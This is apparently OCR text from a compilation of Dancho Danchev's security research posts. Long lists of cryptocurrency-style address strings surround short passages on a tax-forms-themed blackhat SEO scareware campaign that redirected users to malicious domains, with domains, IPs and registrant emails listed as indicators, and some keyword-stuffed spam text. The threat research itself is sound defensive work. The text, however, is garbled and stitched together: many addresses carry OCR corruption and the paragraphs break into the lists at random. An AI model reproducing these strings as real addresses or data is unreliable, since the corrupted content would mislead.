13rjbaXcnLfCkWSeaPZ90HiIWMCFHd9ChxXy 
13RkdMv9C3iKWeqrDfRp8PVp4jfu9o0nU2i 
13RkFMjjhCHYKrbZyBGGEUACMkKNJAn5jHP 
13RMZG9CNa3hpYXYH6mYCUUDWSwROQrlapR 
13RpzXkudpCcNU9SZNCws7Ln8jyLuNc5A1 
13rRBZnUFYPkJP86fGGUjjYiJKKNMzjZZW 
13RRvL7DYpGYutX7WA588Ch6jLyDYE]bfj 
13RtpbqRsS8vd6QAkZ7ikTa4QVtLBWHt55 
13RVxZWTyNndw2YfAyZ2T2M5aNBYm28itP 
13RX6i4046Sd89StmbSuYwB75WP2rKmgLc 
13RxgswiVNKix3RszaqsT56SZHiU2xsz5k 
13S3wZE3S2hoUhwywZEpKZéqb5sYpcixZq 
13SdNWDqFaJwNLDtrjEKDYmsdvjmB7VLYy 
13SF2mal1CUeLKSdRQeGss3urhX6EWzzT2b 
13Sfs2w6VPwrlDFHgBDeFiFbKzp5eeKkbf 
13sGwikKqVQRFndwp2gJHK3nVs3cMJnxUYm 
13SHimuy3XexXyorMt3WesP9XYFizjsu6V2 
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13ShtkJCULBRxsFNmjtWQsUgKKTbPebGCX 
13SjNVsCYk1US5ikvV3Vu42dzNvGxSn9nx 
13spWmnkCD1R4pj4y2S143vw7shC37Yko2 
13sqjo4vgsw7qlTiM9WnSNftgsA4GnG54XF 
13SUWM2mFz2Z2F7s399VWhV58mSaer9zmK 
13sWhf6Hm1Lc3818ML4vrBJSbSYM6dSuJ6 
13T3bLVVW9FZZcsT6JCQLsrjpqHEm88cnk 
13TGGc49Fyjp7U8uJjCedbCRJrvzd2yH5A 
13TGTDQqPUBNzZ1QV2o0wLNR)w59psVvDajcq 
13tjqi2Js4jUX55twyCH9OUVwWWmxXKzDTMut 
13tPKAZ9B3wfFM77DdFJ4rC17JgW2cKzTP 
13tU5Hpbx9AxosgzjycCUZTA8aoWpzhkkLe 
13tW1XziLPkraqd6hbMcYNqulvhQjrLomp 
13Ty5zFnQmWvqGalpfkDZxYmxg21R9NA2M 
13U1tsB5696BxYUYXD6Y3628fQfLOQFsq4y 
13uatk3339EZBYizS6gdYFIAHR45kbyqx8 
13UBNWsrBMLeVNBN13Q31EpKhEZZy40K1C 
13uBqCEakYD7bMRnj7F7QqR2aRPYCAHxQo 
13uCUmxjxx8HL7cqGWZQH]5cKpCb2EAXti 
13ud85RgHxkuvTxzay4w8jk3gRQCjrgMEk 
13UdM5NC6Jn9Qrqhd1k9ERktl6gxm4AQLo 
13udo9UDLBCHKU2uZ6z1nErtkhJ YQeRSbC 
13UgdMK2kQumaFuefaqDB7vhEawPBfFnVU 
13uhVGvVCudKFRXgthLHXfHRnRbdfscfiC 
13usrMrQZEy2YkJLqyo9HJSQE8h9VACUK3 
13USUrfbZoTvhAr36YB5viPL5uvhagQRPP 
13uUgL8QuQi5tZEa5QESosxWjCPCCcKKUV 
13V1sJ6SLcCAjJEZCBMKPMKee8vUqehFpv7C 
13v4pV1TYFD9LW 7urfgBZvkuxPuR58udDT 
13V7ikqxaqoZoEdb2QfqkyWKhFgA7Bzz3i 
13V9WirDbzZEdGQWHi3DSHGM78PR2aZr2tB6 
13vaH5b9kAFeSZSn7tXnvdjabir84hHen2 
13vbDWd4a8QuAsosTWdzg8V5EKu2dicbtH 
13VKVHMH7KigpgyyYcCrtZJSm6rNHBzhB4 
13vryHwXxobT 7wvw6Rt85rJUMtQ2VqQcSb 
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The compromised/mis-configured web sites participating in this latest blackhat SEO cam- 
paign are surprisingly redirecting to a-n-d-the.com /wtr/router.php - 95.168.177.35 - Email: 
bulk@spam.lv - AS28753 NETDIRECT AS NETDIRECT Frankfurt, DE if the http referrer condition 
isn’t met. This very same domain - back then parked at INTERCAGE-NETWORK-GROUP2 - was 
also used in the same fashion in March, 2008’s [8]massive blackhat SEO campaigns serving 
scareware. 


This post has been reproduced from [9]Dancho Danchev's blog. 
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5.8.8 Dissecting the Ongoing U.S Federal Forms Themed Blackhat SEO Campaign 
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13vZfWPAK8qtgtqthqLnt2zrDKutqfthE2 
13W6ep89wGCLyXK68qndMi4vU9K2chBsb5 
13wED4gLdgRQCeTNMSJJqRr7dUZSLinfBA 
13wpsVFWGnaSXF7EygamCq8iuMeqMMzumd 
13WSGhEwp3JBhAeHurRozexBuKetDSXSn7 
13WtkAYo2syD17gV4TmnmEg8NCHM]FaitM 
13wvViJBdmSktvyfl1RDcyQwunU4S44Vis8 
13x2qyde3qzVDB9A5ezHupmVXhjzxXwY229 
13x3To1PkeHLZ95XEZXeTHDMaoxCFd7ggb 
13x5XJby7wp2mCWvmkKt9bGj3YjHzxuXbss 
13xBt7Q2M741dLHDFb9947HG735Ry2A1vC 
13xFaDZX3ibBqzbcYrwCV45rmhQZxW5HXW 
13XFfRHWhhTLRSdJ2L9GryXst1LNq8ci2rj 
13xGopeccuTAPDqG7fhXmtuxE8fYwZktVu 
13XJ4urFA1r8CHak5eyigcQLGYD1EgYydz 
13xk9DHHsSELZUdMUf6SQHWy8LKRZn6s7dE 
13XtWX9XYreEazxFpDZti8kMT 7uD6aq3rM 
13XUv4vJA3SWtAg4XPwT6G2Sce9zsrCPPD 
13XW4KrvwwFaKcWxVGcmjPaxXeHtVFbjqdU 
13XXiZC97TUIN3slaDqQ75wikMkVYmi3kN 
13Y2WGbJM7JzCK1AnzApbEh8RfveiGNTMq 
13Y687aj5dAUkxtkpwwUVcM3NMJpj1JVvb 
13y6wfy8GxLZwB9i5C3C1zEfz4wjXr2nuU 
13YakfevkKWDVFKEf239WT1Udqeo9jTJux2 
13YFfFXYHqQhLcL1IFkGTmfaLQX660Q45HKr 
13yfixStvgsew1LrfHJWLy4pNMePDexhijj6 
13ykRHtnshJTXWZiSLrZXdsnihqThg6FXS 
13ypBZFHybHdZ8tYFkvefbkpqE9bUxt4N6 
13Yy4WdTJAjzjsCP250gEwq9SeSSHxuRp8 
13yzmtbi5P7xCK3ibeEn5F7vifJvZbPWim 
13Z6C1MeBKWHGaqjj8RgMTK4A5skDsoY2XF 
13Z986hiEWvamwQoDf54zQjEorDR7b5YQs 
13ZALZxHKVHwtAKJTaLjaTg9i9J9yuzk2K 
13zaoV6F6jxHW6E5nvpU8w50FfGczaHqDXx 
13zBeL6Rjzzbf7ZmJq3e5NSCgkZWFPbTu3 
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13zbxoHwzFoczngyHbT5suiHXgsfHN4ZFo 
13zfrDPSvwBCzp6B8hu0QLeQtr9coiDws] 
13ZHqZ5t5PTjB4d1Wz2GgMsWA4zb7R56PV 
13ZHUtxQ9EfcmiLaEB9iAqrEDA2wKekXpa 
13ZQF4YsqFVuxUrVEMH4kKxPTpyTBtFVL3 
13ZUDCgNSsvRRe76H8W6CaDknb6CVyRJM9 
13Zwk25d37XVYrKhA1Xx6AtN7i91IRRTQvG 
13ZZWNEbafuSbQyka44KkLHsp6EKXXQcjE 
141GjSvTZnj4FwzEuqT2yyjjUt5krj2ULt 
14124Y9CisThjUhP38iHDa76SP5PNw2Ka9 
1429Q3yLsUoKejvn9Sdwh8ZdbRWe4HBWky 
142aL125uUfbRA4tm9dqkKrTuGs2CYaZ6w2 
142PVK1FEGwfoE464c39zZkPYHo2K5HgN3a 
142re7hmYJrZmbrcefZDWUHDFmvp13PXx04 
142rUgCrszmWGvgBqPuluAJBMRHAqcFiuB 
142TZU6MKZCVJihdG4eYKf5N7Pqubgo1HK 
142ZuVdRariNNxAqmoZvgPvjUsLFrjznxf 
1433FSZ5mdQdwFPvG6pNbgokoCT1NDr2f6 
143bNkS9aqUXeJowgDYXLorFonS956ZTVvE 
143DLnsJqdrGjmxKikSgXybo1UVrMzWakg 
143eqxnkFmKSwM8gpKNH88YXLQs581RL4K 
143f4z7KtmNaJ7ti2CcMsM14sn3iBKwB6N 
143RFam382fekrDw1lLe6sFUCCTM6ZDY8WX 
1447kscuDr8A52kK]SGtdFYUACtELVQmdd 
1449VgcRR5z84GxNr9cguexQEgV1RRE63e 
144XwsLCbVWCP7pa7cQvKVJqrE78z1d3jxX 
145151qR5vGKHRzB4ctH3LY5poCsLZiZRr 
1453DL1kh9wkZWnv6UGr46xMMNXvYRcUud 
1458PzvYuYbWBRgV4ssw1HGdjmqyBovoxL 
1459LH3AiVjFVo3eEC4eHw8Db9eMqKJ14m 
145bGqCdvj 7qTXoANdRNayTE57qqtwS97D 
145Bw6frodyewrwwPCN7i7F94mF32XS21g 
L45NwWE6sVnMTTVD4zaiwHjpUTsoSunX3TD 
1463wIckrK8qywoCQhQ6QME673JZ8gux8U 
1465mUGY64bfkkaMCqEWWvYX527vhLBUED 
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146Hh4HKSfdE5BWr2d16gkCBSUQmm839Fe 
146JqdwjD2LvvyhAxaG2rzBC5JgUpKsTPY 
146M3XF9IwsM] 1hp9CYRpoGSFEj3ftR9fVY9 
146mku8HwfPFNoGRxixtgmfacLAPXTQXeU 
146N1TroH39n1TK8gcRZfdgMnQLXnLoRTi 
146TwrYmBsRnaCAS5SBcgJKJKZKDEvjauLz 
146Wq9fSeUUWdTxVnbd9R59yUFRIWhnEZ2}J 
146YVbgZEWkX2sVeYPSaz1lgcoxelFnuek} 
146ZCYpkb1Eo5ADvwvQYefxVu45J1Zf9Dh7 
146zik3JCd3BBjAq17WujKWfoPn7xHRr6M 
1478txV5QcmmGdsEDVcD7X2hJmMNhXixEf3 
147PBbxsXGTqmGHNscgSAYbpK8ENarphLF 
147q5HMiGp3rYtUKmNagQDGdAcJpQDoMit 
148bFaseorErtzQ255TrxX6E7rygRRSc667 
148d9KdHopzQbym82SrD1LFU37doB5iqJv 
148psBwLkj4DYqtxPhUvT YuXzFMn5cyY4yk 
148qpVw1GgJokZx1EjoxXusQT3SVpvp9HQU 
148SNYbCFMWUMSFyPZkXEabDCfTzsfqmyq 
148SrsDrp3Xi4BCbBXpNgQ4Kg3UpppieMP 
148vU1x278xgVhTF9edeukqpsdDkB4Hguz 
149ETbogY6gyUrRDgxZaDG26Mx5gMEgq8t 
149VN4YwdmXMPxE1NLwo9AHc51XbC85rgg 
149WaqrQ6DS3pmzB6JTbyB2hhHVGg56xVUx 
149XBR1ngy3bHi34CcraWBdnMNtzAx45F4 
14a2U25g1mrxiPnabCz8YL6tHMAEXm311W 
14A2U0682SivvW5WuZDMWJ22skhszGRmwj 
14A7YUed5ucwWh30Gd96wbNzpmtx5AdhTY 
14aa9hF5VEuxT8uVArbAtSKRMBmhjgMwGxX 
14aCcwMTMKLPQFsZYswpB64jSVuUswVun1 
14aecB99eNXjibDyAURCHjF8iw54UgbPdL 
14AEkWtJou8STG7dyDK4hJ8XdZsXcdsXNi 
14AFroDPbjjPvtwpsbxDBr7Q2a7PVgArvp 
14AFsi1zkenJ3RCUKt1z9xiTu79FWkknLF7 
14aMUayS5hpShkjDXCTmLu2Xe2VNZceUS2 
14Apu7zZW4WUbiyomhycVPA3aitRPZXMzrx 
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14Asvu7ewF8GMY7Mp8qgqdMPV5BxfoyvxXt 
14AtaPJ3AN2EFRSK9x9Y86eSBeiboj9c1M 
14Au7QhJZwFtduhkLL49qnRWLZNPR36ENX 
14AvAs5QGy9qmcAru5S8JgAYUUVQHDZ8Ct 
14awZPZzcWc7v5beihzYW1kEeEZfgTvm3H 
14B3QzvSDsYdRAdKDzx8eHsyZoQQgS6cNG 
L4B5vqguaJs3AkXiieqqKzE5qmGvdKxXyY3 
14bDGFoNXeJhpTPPfDHYLzygdRYfxkYyb7 
1L4BEEoQjxc3UXZ8RiddXwZY6LrsaribXYu 
L4BNJYVdkYoorLQUQoYx5rZreKNSdTECW1 
14bSCjUbeVUWACN1V6jwLpVaiArcD73QaH 
14buRC3WParn4q8xh5HYnB2MQdVdgKVbU1 
L4bVMGLu9hJ 7AqtYcyHdkmjbZr9nEBpprP 
14BWrnlevbyvBGGxFZUCVQ61ntNtRjRdm7 
1L4BYiMpzn6Dm23y6M3XkcjxSU9CqcmyGyT 
14C2Q6ZWYicaasK4gdNzbotD75sEUTnNeU 
14cK5w80CseRZRUfBugqB9pqw1D4mHvcnWP 
14CkwUZnVHGM6nTXbrxbVtNdPXoojoVFeu 
1L4cyECGjFAYPu3QvFJKvxBdc4YSXyJ7pYU 
14DbNZ4FDBuba94bfzteNq47z5LkNcSYuS 
1L4DbwFihKF631gipmvqYj36qPWnZxvh42L 
14de9UxEveDpFM3ZHAQRSJi2vKcioStxuy 
14df4hEXkmKcatZtlbpW7QwpkovDMpbgFz 
14dg53yzACoRQ5o0uz7rxDLzGjjj4Vxryrp 
14DnSM7MXBiaDLoVpiAvgfhrd6WoKFB6ao0 
14DpH2GH9qtzgu6u5maY9gkpinBpmC7NA1X 
14dsCNUGBLbbxGpBx1vuTJcwsBDcyz9z9w 
14DxhpKPNAWVGbgRmHn6G2BC6SxXKeH 7dci 
14DXiNAlwnkUamZk5tsovY1CDRbWVRu7T4 
14DyeCVufj|K2d8uG11mdUGMo8P4bPRoqoK 
14E53i37mdT3UHFsb3grBi351LqkJZZMBE 
1L4EbxcqXxP]bgxvqeY5o0tnbqDHZoNj7p78c 
14Ecu71dz8Fu4fCTeE6iStnPqH3hhYm9Sa 
14eGqko56P4hfuQukho6JoobDLhU1Shf9a 
14ehVMj3dgmyowb6VyyVf7hfg1Vyfc7bJYu 
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14EktCGh9bKThbL74FoVGrvKYBQCFHeDtV 
14EMiPseE5TtPW9FN7AAKo9DksGtZrhEHo 
14eMZX6wiU3wSfk9sbFbepbiQrUJokDuv7 
14ep2RvfAnBwzWGHezm5taQ9z9k9hQjk4Y 
14EQ93YNagMPxsF9VYo7Cru56tPugyjk67 
14eQP9S4v3m5qEpCmngqLKEDJHQnPUTMSbc 
14eS3GK3GsXhhBNRqeT5DoZ7EWnCWgYmM1 
14EucmFMSVDz27iKE5Y9pzmFQFwDvyYdfRo 
14evTHQUF7AG6WYZDg5vb4SqnYXVGKHFCF 
14eYGaDvpDVTré64d)JJ yNxm4AwiMvelzGvj 
14ezkbxDU94ECUUepZe6XAcMEJrPR7SR6) 
14fGBoPcRyk7KYTqRuu8FvVWnj8aSqSQpt 
14fH5CoBXQZGixXu3fzAaxu2XkUVMf708q1 
14fL2sDTVPEEyCEVthx5DgfSpNgwncowBv 
14fMwScGVcsDpCyxyju88hgH19DdXkDLvF 
14fnAR65swUJqsFBk1kAd4KZFETjJH7BwST 
14fnBtVjknE3WLXQPJkL47RVsukoYyiQRM 
14FrSCnQhhszneABCex20eHayHaXyoEHLj 
14FSGitKSuU9HVcbXRy2wlezhuV6e53NHxw 
14FUJbpyY2FCy2heztEQfuu4zhwXsjGxXfg 
14fwSctx]Vka2pGk91NavWX1lyexzNRzbWX 
14FzZa9V5v7So3ubndw1B8DsBk2FADSqjG 
14g2MB8QVT8nE7uhcRPVo6X8cjvpjs3Ezx 
14G35HzsZm4nzA6PqKu7bJRfFD9InNP5Siuu3C 
14G3TWBuUFccMvFqcfVUjzCgfgxdeGgu2z 
14G3XKueUVIEP3thEh5XyiBZV69uLYrck6 
14ga69GN9hrrq7VS3BESVA7ZdbzB4xPRDn 
14GafqgLhqXAnPEQEqzEpjnt3wVXdSUCJK 
14gbQKSVT44C412QM71bVqUarVB9P4gDqs 
14GCdop5h9bRYk7jKpBFPRVKgzY3Ra3QQU 
L4GCXTK8iIRrWyP]q3fUWt84gtEmrwPj3TS 
14gJZxwxVUrteqK3JevR5nVJs88DHgoLxY 
14Gkzuj2avRNX98REgP]xgjyEWiGrjgKpF 
14GPtZQvuMEiPFeT8LT9HWWWLIiCf9gauav 
14gscPLMQXdanrs2271WfEaHNalfHuSXxq3 


24997 


1L4gSMdxdWY6h43JtT68glogTQ71w2cAcf2 
14gW2wmQ6aFRcmG5DLJU4KwWyNuseYxYVU 
14gwxAnwKvwUYQKrPUWVdduqUJAmJP16cu 
14gY225vUwtl1ZwkKpCaAKJn5mpCoUnYHS/7d 
14h4pGuwa77z7BfRf89TXE8TFzgBax7aS7 
L4h5HXuUHP2ZjKEXGDRBquQZqy3vHZHNogeD 
14hczTzPoa8cxbLSWmxutX40s6Vzs3QH5M 
L4HjFPJYvNJ8hLbb7UXY4hrvoR4XwggiCx 
14HLK1d3xrzkH5eTXvEjsMeDpwwi3yR9Dz 
1L4hWxVBzf6j4USLo862BQFWpD2V3ek1kt2 
14hWySXgQwmCtVGRJQrnULkcyUW5gUq7rT 
14hYJ1ZDP6ntL7QoLSwrDp7cCwJNpcaqno 
14hYp5afb6AnfzYDvya54rBQ4Y3fApbw)2 
14iAXnB1GBrTHhrXxZFPKdFVVWCsfxVvwR 
14iB1WxbjynVqAPhM9fyH2QZQubbqWySoE 
14idngvnUDxnuz6NFYTNTatht33VxuSHLA 
1L4iH5F2ZEfANe7YKMNY496zayxRiLCfz8t 
14iTSgWEmUqaSGCushAAXVKmBikBTkrFU6 
14ittb3A6MahzCsxLE8rafm1Fb13BvqMM7 
14ji6mxhqRyq4m3Bq22ST5wyFKrTFtTIfC 
L4JKYYBiXc1PmjEos3WUYFYv6XuMrVLrPE 
14JQu8bS3UFK54MGoArh9NQPa32jtgwpnj 
14jR2f7hHDrWBFxdr7T9aYSEHZB6DV5pEvp 
14jYiRqroonzvrLQSsACjk9e9JicuUENTCY 
14K2HuXw9h6n9TH6E6p1KTvjwzWvCjrgz5y 
14kbgSydX5JfwVWMLgcB9yiBqkvQHgwV Xe 
1L4KCMm2iAQmdj7V89vVOHEu6dMiql RpZAb3 
14kCr7TmfELoyzDBg2midicuqwg2Ho23Xk 
14kctdVUBiAj40iPeYX2ZrzEt5S4ZDbQjx 
14Ki1WSj5eP6g9YxGYSV5iXyGNDjsuW10E 
14kKj5raEwMbemé6tZuprUmoYnPQz3Ur17Uq 
L4KRFLRzZd7VrjmNM5MbaegE4PeJtBkikgv 
14ky88T3rvBx1no4Z9Bhscxe5t9sQoJMGD 
14kYmvNLtGvKPnWvZatdsRaJRmq5Wuj2ZN 
14kYUcCn18Y3A1nh2bgV73RUB3kKMe2Ure 
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14LCFAU2ro6jkBs84U7NWNpYm3uf]3fyHQ 
14LzhcR8mMr9KBtQZKKKZegr3vRUpszYbg 
14mahaoUNQeRy4uaJVaxXCJmDyidTzSydr7 
14mhNYZL4GfYc33dRIQD9x5n22MPnP83Fk 
14mQPx1UkKhFiQrzkieFrGXkXPA3mEyn40Q 
14mv30xwSFa2mNjghFy7i8n8D9833a3r2o0 
14MY8bWDGb1QqJDx6VDUnsghnEpRNzAcaH 
14N883pP66waLqDDw2wBD6sPMMbpxMtFSo 
14naknKFqeaz3LfXwH9L2tiHmuaNjdDV64 
L4NCuFXKEHGNxwdkoBYM3WhasnvR5NQ8Mv 
1L4NjGQEmzfjtAuUxxiPAY84QEFQDHX2V9V 
1L4NMFU75NymwGr3zotMFW6JKSGloyS2dxU 
14noP772N7iZND71ho8abQaoMX6ZA3REds 
L4NvVENZB56QnBDi1bXCHn3GzZHovvbioUA4 
14nVKVRo8aoiei39Cj6X4C5Skv7KvRDEmn 
L4NXQvnbuFET28K78SkDeqrWPsfoMa24am 
14068jHFBQcTJeHTuxFifUmfEXEIEN8kUQ 
140aCNV2t5dPNM1jMK9s6tLeY88Q7MbGbo 
140jmcLHqSeZmGsNjJJ99136y5izfB9gvjP 
140W8wquqs3H)J7PpkkKMMVuTjaPucCeCV2M 
14pekkwuAJgy4xWTYGV4aqbg1T6A8AdJS2 
14PJ9jibE9LPF99XhUaeuMfhdgHqQZEcLa 
14pm1NstgjGH1MSVLSVYDENLJtvHFJeUQW 
14PP88aYoNwi2gTQnX24QDV1CcQHPgxWw4Y 
14ppqr6HK8aJxfUMFMHyyz9TqJVPD8E7zU 
14pqyLdLHQ95JquMRKe5Xd7wvoV2EB3b7X 
14pSH8nDec3x3RFpQL8DAvfpjwgKz4zXgX 
14PsKqcN85pAb6myAjfA6BRfrDKwELaYCR 
14PVeuWDANBzgp1SMzHgzméh5pyFhncxkP 
14q50cAFBYvF2GVkdZHHHw1xLXxyCiDPVy 
14Q8AD2nYTtVANha61L6QBXgMZNRMA3CAT 
14qd1loul1MRgbJDKDgnoQeFnmLaKKN6j66x 
14QjJDqfmi4goqBBtRjEwSws9YYwov7msM 
14qlLVX57MHH9cgZ4RVHLMAjUgkPV49VdU5 
14QRGsxLEEHWEDiUQEFVMLge7mQvF9iibc 
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14QzX2jUnmHwXkAfS5iLxuG5cTga7ppg6Y 
14rGFdBqxsi932Tpq6K56isQL2MxUHdWeg 
14Rm54FDy3)JrgAhuT 9UHUWtGDxLucLT9BV 
14rnGq3DAV4My2egMsSAi4i8XZLpj7WFgh 
14RpbBDacbPVilJhRbpBSN2FrLSTed8g3P 
14rpSyyhdgUoJ214Jtc8mzymjGBmubqFg2 
14RuZGdMDgw5]3BtfHZB68uUE7QTg4TZXYG 
14rwPaUWxsLvxVCDVuUUEJGZRtwozrm4C5 
14s1WzexhAmUq9nAQZ7cryT8fboVhhaZutg 
14saXADABViFUIZUSFgFGNKHd1cxPMaQaE 
1L4SFOMKXR3kxSszu2XP8yUqn1JeQo3ynMY 
14skKFyze7HFf2rvEx62nqbDapjKyJQh5uX 
L4SLtARQH5fEKTNM5US5R55ksT9PV8BXP4 
14SqghTnu7neoHRpmEaT}l5xdAE5atS5DWW4VZ 
14StRCXZoE4Mm5EwhocddUqP6FNM72WYTq 
1L4sTVpVMxi7aemvjPKvGN8ErrxwGczoWNW 
14sWi4L6WQn7BDeRvw9nGCzntuQCfuyh43 
14SzDpiwZWqxSXj1l6vNTCJEr|KsjfabyKi 
14t6xgDNvoLSk4mm1W9xaH7xyrDa4GHFEU 
14t8gSBQ7S6iUDEZKUjdQuUc7Yo3dX3KJS 
14taH13QdhjncMHgB17pRSw952AiC69YDC 
14tAjTndmMhT 7LbgDoeiMQscTGhMavrGDg 
L4TGRqTPaQTbz7fMvZNAEKUWK4sAzg8PKv 
14TGUtzj37jN58E9BcG5LeEoacnUL6TAHb 
14TLC37VCwtsf2xUPZY8DFtSbwMqA5Gewe 
14tmSfXQCKnmMHzvwBzKqNyBbxjT97Mk9s9 
14TokUMKh3KCaJdEUQVmNAS5NXkkoqnCp39 
L4tRAPAcoWizvnFQLQJunZ2SaqjiovjJcnEN 
14tRqtbeWrHfDDuaFF91mMK1eUVLNx4Hq6C 
14tsQszpA92SfvZBkjZsKj CHpEfobeNGEda 
14TUppiAxSWzfLbn5ZMpwjnrRRccDGC5Fm 
14tUSiIU4PfmbKjiL6LM6Jm97U9pLuCbVw4 
14U5YohaUtXRMMb7sqeTA6kcFJ6hHwwZi7 
1L4U8S3NGjydYQotxx9ujEcprH9nAizvdyG 
14U9iWdcHCJo7GKVj5z5QpybBGQsDnLt3A 
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14u9M2sWi6rPHKAgkM5fP89pDes6E3wCmm 
L4UAPuJ9MoUWEbjM1mem7uVtr92HpxuUSS 
14uCvxAAt7KZwcDgGvbmRTDuyGbvyZSB5G 
14uGdDMK]JgXiyf1ZtbJAii5YZAjLdByPvo 
14UHED21vHehMWdEpejKRft2tXwNJwafk8 
14UmMUN7gX739DsyUrxuEPgUEueAbhsos4G 
14U01UvgcZcubouVdmg7GuRmZm2LAFrYR) 
14u0jWYKSLLJTyPUk94Rdsbfu3wdgqcati 
14UQeVEfBPGQq48iZuxXYugDcDhUkxX6Ctpw 
14URznXfLJRN8ROAWYqMTaQX1p4ikQj3TX 
L4UvvwvGf2skkP]GMULYbVqWw8FG2qX2fBnK 
14uyKybqv9hwnMmTWb98XhEVdThemfSgix 
14v4DfqrEs60o2DyUuuqnQQAQB/7dhcxTly5 
14V7AUh327MTd45T2USeEEJGgdD4SSdGmN 
14v7RM1oZQBVCIAJXUWT7P497tLjPQKW8R 
14viECb13cM1ZUFNMXDKB4Y54pfvzev6BD 
14vjGHppkZP52SkuCLK7nhcZ2TsZHSM6z4 
14vjouet4ede6A4QCbNh9Ub1Lbyvp1DzYQR 
14VrtKAtS7 7TyGQhND6j1hkWBDMQ4ELqLT 
14Wfz226sXSSiidA4uFizohucM85ktF49N 
14whqbXAGiGgxfe76uoHFdoM9AW9yumfD8 
L4wNDKKC2kGUPJfDMwTZ6Yhoiwv9kg2EGD 
L4wNWk68gS47Q32r4pGaHkEBRfLjec83vy 
14wQoZTR6KkrZDKNRjJUhgSMDmm5uEx19iM 
14wrNKFfQPj1FAfax9poFCytkCTE1CjWoB 
14wukauDbZNVF6VddckvZ3tLB7pKJsK6eZ 
14wUympzj3zzHb1jg38DwjNx4NhZkuDamk 
14WZ7ug75wSxrcqVKRWM8WbxPw2MJhbzkd 
14Wzsg3P3yZGy3b7SJCKMn62Avx27kbHME 
14WZsWnknGGpLsiBMDmFyptBj8rLVPRgvu 
14x52i0FC1Ya2jLJ7 7w2EkySqjFVjbDQ7YA 
14XjMFRsFVfndGPUcZ7hKh5HMrbCUJhQN3 
14xn3NYMz119PHwWBSrckxDTwKePLWzCo6e 
14xpc2p3h2ANRYNbn9YJnAJE7eQgGs7NKXj 
14xPPEYfapgaVe5PdZHGPDbD7CEDY1levzs 
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14xQ9HZ6ywg90z2QpQsfn1XCqiMFf5XMiD 
14xRRFL42vZkRsSZMhgrmNjhZM3CpGN7CF 
14xUzZ48VPR197qrPpwoE6gqfg9W8VEVRbZ 
14XvRW8RRLH4hPGzmrmjCtHZEtLRmQecoE 
14XX7fw4ABhHLUT3Z1Dq7seKFWJkzxe6We 
14xx7X8PyV1PeW78eJHqRNvyxsjhfy8i96 
14y83KBYVNBBrSKc79npQuYejrcdnb2PBe 
14yBMDhibi4PNVAqHmw5H9gM8tzdJn4DdD 
14YbRNuwB2toPwTzyPDnxCqGiFhSD5t4Tz 
14yfRcYXUEMSLTK74e1VDtZjwEGbjEf4Jx 
L4YFrUNZMh8xfaWSfFRpa4Qw9U6gqUZLUZ 
14YJJZQ6ucv9EU3DyAuxTK4BT8ydTCiFQU 
1L4YN2SNBBWfG7jL51laxtdLaaFmQ8FDDUnX 
14yrZNGgaUd71sbqerbL6XMDbdNHAkKsTz 
14YStjJervFzZRLDd2o0nZFKy6hzsspeQ9Uwp 
14ytYz9PeMHSNohrMPZanae9Zw67upXkcW 
14YusAiLWVAcGyGQcJ55qPxF3V5ySai3a6 
14yyUiPs7wxadSWchUcW8EuyocR7Gsb36Z 
14Yzog5pj2HNnF lmgkCSHeScfMZnbWJ5XD 
14Z9tzrjHfg V5yGLqvcxURyP9dmS17DUVY 
14zjSaoEZNJWKioZ4LqbwdVDyaMaBFmp6U 
14ZLhy 7JjZbLZdQkCwCn98fqCV8uJ3Kk8G 
14znfv9kM2uHdsyBWaUJg7VppEK74DeqiB 
14ZXuY6QA04i7GIVIYHFFDYiu6FbGeaGuP 
14ZYa3caTZg8bTYSSLHMDmJLGLmewf5tpx 
1512rXoK2gYUr6k8tFiL7_LGNFwZNtVPSr2 
151bb037FxBqsb84vFyCSX9CdzDxhispMz 
151bEqmzfGxkPy4mEKwbyYyfgBKZEW6dDt 
151EGp7watQPf5xMNzPrd1VJsNsEqJQNQ5 
151fgTr9rwecmQR8xRq /7f6vZFCUNpLLkKEL 
L51TJEfFTfYUH1LFEWjKF8euCk15tufBDrze 
151zZUrmhDpDDWHLWgnkxMH9YTOLiX72EpR 
1521wgJMgHHyke97apS3Zq3F2ps61wSZgT 
1524menfY8tZqcBTPkqLD7 DG8RnX9FwVZM 
152EUrLigMLZ8TeuKjz967cPJpT 72bQRGp 
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You Can Get Forms W-7 And SS-4 From The IRS By Calling 1-800-TAX-FORM (1-800-829 9. Association, Club Religious, 
Charitable, Educational Or Other Tax 


Business name, sign and date the form. 4. the #s tells you that you are subject to backup use the appropriate form w-S. 9. a futures Commission merchant, rs resources. compliance & enforcement. contact my 
local office instructions foe form 706-a, united states additional estate tax return. 1206. 12/19/2008 


You can get forms w-7 and ss-4 from the ms by calling 1-200-tax-foem (1-800-829 9. association, chub rekgious, charksble, educational or other tax, Tax Forms Listed Are From The Internal Revenue Service 
(IRS) W9. Request For Taxparer identification Number And Certification. Eamed Income Tax Credit 
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Preview and download documents about petable is tax foems. docstoc is a community for sharing professional documents, tax forms w9, 2007 is tax foems.. irs tax foems. from widpedia, the free 
encyclopedia (redirected from w (united states #3 form) made are usually reported on a form 1096 o¢ 1099 [9] 


Forms Missouri State OF Tax Forms Reprinted Printable Tax Foems W9, W Tax. IRS Does Not Reconcde The Wages On Line 2 Of The 9415 To The W2 Forms , That, Preview and download documents 
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Pristable Irs Tax Forms W 9. vé6dgdsfsdedg0S 


AltusHost Inc, the company whose services were exclusively used in the [1]blackhat SEO 
campaign using [2]U.S Federal Forms theme for scareware service purposes, has finally 
responded to the abuse notifications sent seven days ago stating that "the sites have been 
terminated". Such a slow response once again proves that dysfunctional abuse departments 
increase the lifecycle of a malware/spam/phishing campaign by not taking it down when it’s 
most actively gaining momentum. 


(For historical OSINT research, the following domains not previously listed were in circu- 
lating during the past week - thwovretgi .com - 91.214.44.239 - Email: joby47619@msn.com; 
shtifobpy .com - 91.214.44.210 - Email: hiraldol3686@hotmail.com; vodcotha .com - 
91.214.44.203 - Email: jamarcus59884@yahoo.com; stromiko .com - Email: hyacinthiem- 
ccolman@gmail.com; ceslyemsof .com - 91.214.44.205 - Email: brisco68781@lycos.com; 
ejeifyevy .com - 91.214.44.208 - Email: brisco68781@lycos.com; kuhatjidd .com - 
91.214.44.203 - Email: khristal2110@hotmail.com ) 
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152hJxoDdnJeQU6VJjVC2mckjookZk4VTU 
152LfB5rEXnWvk2W2GvvcQWjX6ibC4kKna 
152ub82rBnUAPxY2KiE6jBaEznGdCdjrlg 
153Doofb2kEma6Lt4ag7bVh2mMNFpMKm3Jr 
153mMKCBXsAyatXDTXQuJJAJ7BV6f3R13RH 
153vsB1mLwLcs1M1dBkxVRKP4SgR6yPdT2 
1544RREXjgWChMdtrwWnUQp68P3PFpB5oi 
